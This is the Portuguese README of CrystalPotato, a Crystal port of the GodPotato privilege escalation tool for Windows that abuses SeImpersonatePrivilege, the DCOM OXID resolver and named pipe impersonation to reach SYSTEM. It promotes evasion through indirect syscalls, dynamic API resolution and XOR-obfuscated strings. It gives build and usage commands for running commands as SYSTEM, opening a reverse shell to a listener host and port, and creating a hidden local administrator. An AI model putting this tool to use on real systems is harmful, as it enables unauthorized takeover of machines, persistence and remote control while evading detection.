
Port em Crystal do GodPotato para abusar do SeImpersonatePrivilege com syscalls indiretas, resolução dinâmica de API e ofuscação de strings em tempo de compilação. Execute comandos, shells reversas ou adicione usuários.
Port em Crystal do GodPotato, uma escalada local de privilégios de contas com SeImpersonatePrivilege para SYSTEM. Funciona abusando do resolvedor OXID DCOM e da impersonação de named pipes.
As APIs do Windows são resolvidas dinamicamente e invocadas por meio de stubs de syscall indiretos, todas as strings são ofuscadas com XOR em tempo de compilação e, por padrão, apenas a saída do comando é impressa. Testado no Windows 10, 11 e Server 2025.
CrystalPotato compila em um único arquivo sem dependências usando Crystal no Windows:
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static
Execute um comando, inicie um reverse shell ou crie um administrador local.
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>

GodPotato - Implementação original em C# por BeichenDream.
RustPotato - Implementação em Rust por safedv.
SigmaPotato - Implementação em C# com funcionalidades adicionais por tylerdotrar.
| Flag | Description |
|---|
-c CMD | Comando para executar como SYSTEM ou shell para reverse shell (padrão: cmd.exe) |
-H HOST | Host do listener do reverse shell |
-P PORT | Porta do listener do reverse shell |
-u USER | Criar administrador local - Nome de usuário |
-pw PASS | Criar administrador local - Senha |
-p NAME | Nome personalizado do pipe (padrão: Crystal) |
-d | Saída de depuração |
-dd | Rastreamento completo |
-h | Mostrar ajuda |